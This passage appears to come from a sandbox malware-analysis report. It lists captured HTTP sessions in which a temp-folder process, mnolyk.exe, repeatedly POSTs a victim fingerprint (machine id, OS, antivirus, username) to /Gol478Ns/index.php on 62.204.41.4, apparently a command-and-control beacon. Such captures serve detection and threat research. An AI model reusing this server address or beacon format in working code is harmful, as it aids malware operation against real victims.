                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      758 | 192.168.2.7 | 50453 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:24.103441000 CET | 873 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.168864012 CET | 873 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      759         192.168.2.7  50454        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:24.351475954 CET  874                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.415527105 CET  874                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      76          192.168.2.7  49771        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:21.708261967 CET  191                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.771372080 CET  191                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      760         192.168.2.7  50455        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:24.593085051 CET  875                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.656892061 CET  875                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      761         192.168.2.7  50456        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:24.827370882 CET  876                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:24.891055107 CET  876                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      762         192.168.2.7  50457        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:25.069011927 CET  877                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.133157969 CET  877                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      763         192.168.2.7  50458        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:25.313774109 CET  878                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.378963947 CET  878                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      764         192.168.2.7  50459        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:25.566570044 CET  879                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.630063057 CET  879                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      765         192.168.2.7  50460        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:25.826616049 CET  880                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:25.888734102 CET  880                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      766         192.168.2.7  50461        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:26.066420078 CET  881                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.132620096 CET  881                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      767         192.168.2.7  50462        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:26.316744089 CET  882                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.380753040 CET  882                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      768         192.168.2.7  50463        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:26.545691967 CET  883                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.608530998 CET  883                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      769         192.168.2.7  50464        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:26.781065941 CET  884                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:26.845169067 CET  884                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      77          192.168.2.7  49772        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:07:21.956084013 CET  192                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:22.022943974 CET  192                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      770         192.168.2.7  50465        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:10:27.020473957 CET  885                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.084064960 CET  885                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      771 | 192.168.2.7 | 50466 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:27.272311926 CET | 886 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.335064888 CET | 886 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      772 | 192.168.2.7 | 50467 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:27.519526958 CET | 887 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.584702969 CET | 887 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      773 | 192.168.2.7 | 50468 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:27.766830921 CET | 888 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:27.829786062 CET | 888 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      774 | 192.168.2.7 | 50469 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:28.062597036 CET | 889 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:28.126764059 CET | 889 | IN | HTTP/1.1 200 OK
